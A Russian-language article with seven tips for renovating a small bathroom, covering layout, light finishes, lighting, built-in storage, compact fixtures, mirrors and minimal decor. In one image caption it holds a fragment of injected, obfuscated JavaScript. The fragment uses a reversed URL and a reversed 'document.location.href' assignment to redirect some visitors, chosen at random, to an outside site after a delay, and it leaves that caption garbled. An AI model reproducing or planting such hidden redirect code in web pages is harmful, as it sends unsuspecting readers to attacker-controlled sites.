Добавить в закладки

7 подсказок при ремонте маленькой ванной комнаты

Если ваша ванная комната метр на полтора – это не повод для грусти. На сегодняшний день дизайнерами придумано много способов обыграть пространство даже на таком небольшом участке. Для этого необязательно обращаться в дизайнерское агентство, ведь мы приготовили для вас несколько простых и практичных идей по обустройству маленькой уборной.

Ремонт в маленькой ванной комнате

Ремонт в маленькой ванной комнате. Фото: o-vannoy.ru

Измените планировку

Возможно, в вашей ванной площадь окажется больше, если некоторые предметы переставить. Измеряйте квадратуру рулеткой и нарисуйте схему новой желаемой обстановки. Разумеется, сантехнику не передвинешь, как мебель. В таком случае можно прибегнуть к объединению со смежным помещением.

Если вы не ярый поклонник глубокой купели, то смените ее на компактную душевую кабину, дизайн которой может стать изюминкой интерьера санузла.

Разгрузить комнату можно перенеся стиральную машину на кухню или в коридор.

Удачная отделка

Визуально расширить пространство смогут светлые оттенки как на стенах, так и на потолке с полами. Это не значит, что все должно быть снежно-белым, но комбинировать нужно 2 светлых тона.

Верным решением станет глянцевый натяжной потолок, создающий дополнительные блики.

Натяжной потолок в маленькой ванной комнате

Натяжной потолок в маленькой ванной комнате. Фото: accbud.ua

Для стен можно использовать влагостойкие фотообои, которые всегда выигрышно «раздвигают» стены.

Фотообои в дизайне маленькой ванной комнаты

Фотообои в дизайне маленькой ванной комнаты. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tooboi3.jpg»>rem-stroitelstvo.ru

Игра света

Важную роль играет правильное равномерное освещение. Идеально, если в потолке будут установлены точечные лампы. Дополнительная подсветка возле зеркала, тумбочек, полочек только плюс в небольшой уборной.

Подсветка в маленькой ванной комнате

Подсветка в маленькой ванной комнате. Фото: mr-build.ru

Встроенная мебель

Установка встроенных шкафчиков в одинаковом стиле создаст цельный интерьер. Если вы спрячете в них все, что только можно – помещение наполнится простором. Устанавливайте полки и ящики под раковиной, над ванной с унитазом.

Навесные полки в маленькой ванной комнате

Навесные полки в маленькой ванной комнате. Фото: interiorsmall.ru

Выберите подходящую сантехнику

Ванная, раковина, унитаз – незаменимые элементы, которые могут существенно «красть» драгоценные сантиметры. В продаже существую их негромоздкие разновидности, типа угловых или боковых моделей.

Угловая сантехника в маленькой ванной комнате

Угловая сантехника в маленькой ванной комнате. Фото: i.pinimg.com

Подвесной унитаз не всегда экономит пространство. Если ваши стены недостаточно надежны, то придется использовать крепеж в 12 сантиметров, а это немало.

Большое зеркало

Чуть ли не главный аксессуар, о котором нельзя забыть. Если есть возможность купите не запотевающее с длинным сроком службы. С его помощью добавится воздуха, помещение будет выглядеть светлее.

Маленькая ванная комната с большим зеркалом

Маленькая ванная комната с большим зеркалом. Фото: design-homes.ru

Минимум декора

Излишние нефункциональные предметы будут загромождать поверхности, и ванная снова станет маленькой. Купите красивую, но легкую корзину для белья, поставьте настоящий или искусственный цветок, расстелите пушистый коврик.

Если у вас есть окно в санузле, то завесить его лучше всего рулонными, римскими шторами или горизонтальными жалюзи.

Не бойтесь экспериментировать, но помните об этих подсказках, которые помогут создать максимально уютное и функциональное помещение.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 17.06.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: